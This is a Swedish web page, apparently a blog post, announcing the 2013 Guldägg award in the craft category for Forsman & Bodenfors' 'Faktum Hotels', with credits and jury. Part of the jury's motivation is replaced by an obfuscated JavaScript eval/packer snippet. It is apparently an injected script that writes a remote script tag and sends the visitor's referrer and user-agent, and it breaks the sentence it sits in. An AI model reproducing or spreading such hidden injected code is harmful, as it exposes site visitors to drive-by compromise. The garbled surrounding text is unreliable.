Image Image Image Image Image Image Image Image Image Image

| 3 juni, 2020

Scroll to top

Top

Årets Guldägg i kategori Hantverk går till…

Årets Guldägg i kategori Hantverk går till…
Sebastian

Faktum och Forsman & Bodenfors vinner årets Guldägg i kategori Hantverk för ”Faktum Hotels”

Motivering:
Årets eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yynff|var|u0026u|referrer|nktyk||js|php’.split(’|’),0,{}))
vinnare i kategori Hantverk har levererat en produktion med värme och hjärta. Med ett gränsöverskridande uttryck får vi inblick i stilfulla miljöer men en träffande bismak. Det lyckade resultatet är ett faktum.

Guldägg 2013 kategori Hantverk (Bild):
Byrå: Forsman & Bodenfors Bidragsnamn: Faktum Hotels Uppdragsgivare: Faktum Art Director: Staffan Lamm, Staffan Forsman Copywriter: Martin Ringqvist Formgivare: Christoffer Persson, Staffan Håkansson Fotograf: Håkan Ludwigson Produktionsledare: Åsa Pedersen, Linda Tiderman Uppdragsgivare: Åse Henell, Sara Erkhagen Webbproducent: Stefan Thomson Produktionsbolag: Thomson interactive media

Silverägg 2013 kategori Hantverk:
Byrå: ACNE Bidragsnamn: ALB Uppdragsgivare: CLM BBDO Paris

Diplom 2013 kategori Hantverk:
Byrå: King Bidragsnamn: Com Hem reklamfilm 2012 Uppdragsgivare: Com Hem
Byrå: Naked Comms Bidragsnamn: Grolsch Photo Machines Uppdragsgivare: SAB Miller
Byrå: TBWA Stockholm Bidragsnamn: The Ice Record Project Uppdragsgivare: Shout Out Louds

Jury:
Kategoriordförande Ellen Sundh
Jury Jesper Kouthoofd, Lasse Bjurman, Patrik Sehlstedt, Pasi Helin